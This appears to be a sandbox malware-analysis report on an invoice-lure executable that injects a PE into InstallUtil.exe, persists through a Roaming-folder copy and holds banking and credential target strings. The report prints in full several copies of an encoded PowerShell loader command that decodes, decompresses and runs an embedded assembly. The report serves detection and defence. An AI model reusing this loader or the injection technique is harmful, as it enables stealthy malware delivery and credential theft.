Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 9_2_04F2B440 LdrInitializeThunk,

9_2_04F2B440

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 46C000	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 46E000	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 2F1008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 46C000
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 46E000
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: F21008

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "c:\users\user\desktop\fattura-24sc-99245969925904728562.vbs.exe" -enc jabgahaadabqahgacgb4agkaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqatgbragwacwblahgadaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeyacab0agoaeabyahgaaqagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbmageacwb0acaamqa7acaajabaag8aaqbsaguadwbmagmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatgbragwacwblahgadaauafiazqbwagwayqbjaguakaanafiarqbnacaajwasacaajwanackalgbsaguacabsageaywblacgajwbaaccalaagaccaqqanackakqa7acqawgbwaheababxageaegbpageaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafoabwbpagwazqb3agyaywagackaowakaeqaawbtagiacaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqasqb2ahkazwb5ag8acwb2acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakafoacabxagwacqbhahoaaqbhacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabjahyaeqbnahkabwbzahyalgbdag8acab5afqabwaoacaajabeagsabqbiahaaiaapadsajabjahyaeqbnahkabwbzahyalgbdagwabwbzaguakaapadsajabaahaacqbsaheayqb6agkayqauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakafoabwbpagwazqb3agyaywagad0aiaakaeqaawbtagiacaauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqawgbvagkabablahcazgbjackaowagacqauabtagsazgbxacaapqagafsauwb5ahmadablag0algbbahaacabeag8abqbhagkabgbdadoaogbdahuacgbyaguabgb0aeqabwbtageaaqbuac4atabvageazaaoacqawgbvagkabablahcazgbjackaowagacqawgb5ahmaeab4aguaeabnaheabwagad0aiaakafaabqbragyacqauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafoaeqbzahgaeablahgazwbxag8algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakafoaeqbzahgaeablahgazwbxag8algboageabqblackalgbeahkabgbhag0aaqbjaekabgb2ag8aawblacgakqagahwaiabpahuadaatae4adqbsagwa
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "c:\users\user\appdata\roaming\osdescription.vbs.exe" -enc jabgahaadabqahgacgb4agkaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqatgbragwacwblahgadaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeyacab0agoaeabyahgaaqagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbmageacwb0acaamqa7acaajabaag8aaqbsaguadwbmagmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatgbragwacwblahgadaauafiazqbwagwayqbjaguakaanafiarqbnacaajwasacaajwanackalgbsaguacabsageaywblacgajwbaaccalaagaccaqqanackakqa7acqawgbwaheababxageaegbpageaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafoabwbpagwazqb3agyaywagackaowakaeqaawbtagiacaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqasqb2ahkazwb5ag8acwb2acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakafoacabxagwacqbhahoaaqbhacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabjahyaeqbnahkabwbzahyalgbdag8acab5afqabwaoacaajabeagsabqbiahaaiaapadsajabjahyaeqbnahkabwbzahyalgbdagwabwbzaguakaapadsajabaahaacqbsaheayqb6agkayqauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakafoabwbpagwazqb3agyaywagad0aiaakaeqaawbtagiacaauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqawgbvagkabablahcazgbjackaowagacqauabtagsazgbxacaapqagafsauwb5ahmadablag0algbbahaacabeag8abqbhagkabgbdadoaogbdahuacgbyaguabgb0aeqabwbtageaaqbuac4atabvageazaaoacqawgbvagkabablahcazgbjackaowagacqawgb5ahmaeab4aguaeabnaheabwagad0aiaakafaabqbragyacqauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafoaeqbzahgaeablahgazwbxag8algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakafoaeqbzahgaeablahgazwbxag8algboageabqblackalgbeahkabgbhag0aaqbjaekabgb2ag8aawblacgakqagahwaiabpahuadaatae4adqbsagwa
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "c:\users\user\desktop\fattura-24sc-99245969925904728562.vbs.exe" -enc jabgahaadabqahgacgb4agkaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqatgbragwacwblahgadaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeyacab0agoaeabyahgaaqagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbmageacwb0acaamqa7acaajabaag8aaqbsaguadwbmagmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatgbragwacwblahgadaauafiazqbwagwayqbjaguakaanafiarqbnacaajwasacaajwanackalgbsaguacabsageaywblacgajwbaaccalaagaccaqqanackakqa7acqawgbwaheababxageaegbpageaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafoabwbpagwazqb3agyaywagackaowakaeqaawbtagiacaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqasqb2ahkazwb5ag8acwb2acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakafoacabxagwacqbhahoaaqbhacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabjahyaeqbnahkabwbzahyalgbdag8acab5afqabwaoacaajabeagsabqbiahaaiaapadsajabjahyaeqbnahkabwbzahyalgbdagwabwbzaguakaapadsajabaahaacqbsaheayqb6agkayqauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakafoabwbpagwazqb3agyaywagad0aiaakaeqaawbtagiacaauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqawgbvagkabablahcazgbjackaowagacqauabtagsazgbxacaapqagafsauwb5ahmadablag0algbbahaacabeag8abqbhagkabgbdadoaogbdahuacgbyaguabgb0aeqabwbtageaaqbuac4atabvageazaaoacqawgbvagkabablahcazgbjackaowagacqawgb5ahmaeab4aguaeabnaheabwagad0aiaakafaabqbragyacqauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafoaeqbzahgaeablahgazwbxag8algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakafoaeqbzahgaeablahgazwbxag8algboageabqblackalgbeahkabgbhag0aaqbjaekabgb2ag8aawblacgakqagahwaiabpahuadaatae4adqbsagwa	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "c:\users\user\appdata\roaming\osdescription.vbs.exe" -enc jabgahaadabqahgacgb4agkaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqatgbragwacwblahgadaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeyacab0agoaeabyahgaaqagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbmageacwb0acaamqa7acaajabaag8aaqbsaguadwbmagmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatgbragwacwblahgadaauafiazqbwagwayqbjaguakaanafiarqbnacaajwasacaajwanackalgbsaguacabsageaywblacgajwbaaccalaagaccaqqanackakqa7acqawgbwaheababxageaegbpageaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafoabwbpagwazqb3agyaywagackaowakaeqaawbtagiacaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqasqb2ahkazwb5ag8acwb2acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakafoacabxagwacqbhahoaaqbhacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabjahyaeqbnahkabwbzahyalgbdag8acab5afqabwaoacaajabeagsabqbiahaaiaapadsajabjahyaeqbnahkabwbzahyalgbdagwabwbzaguakaapadsajabaahaacqbsaheayqb6agkayqauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakafoabwbpagwazqb3agyaywagad0aiaakaeqaawbtagiacaauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqawgbvagkabablahcazgbjackaowagacqauabtagsazgbxacaapqagafsauwb5ahmadablag0algbbahaacabeag8abqbhagkabgbdadoaogbdahuacgbyaguabgb0aeqabwbtageaaqbuac4atabvageazaaoacqawgbvagkabablahcazgbjackaowagacqawgb5ahmaeab4aguaeabnaheabwagad0aiaakafaabqbragyacqauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafoaeqbzahgaeablahgazwbxag8algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakafoaeqbzahgaeablahgazwbxag8algboageabqblackalgbeahkabgbhag0aaqbjaekabgb2ag8aawblacgakqagahwaiabpahuadaatae4adqbsagwa	Jump to behavior

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
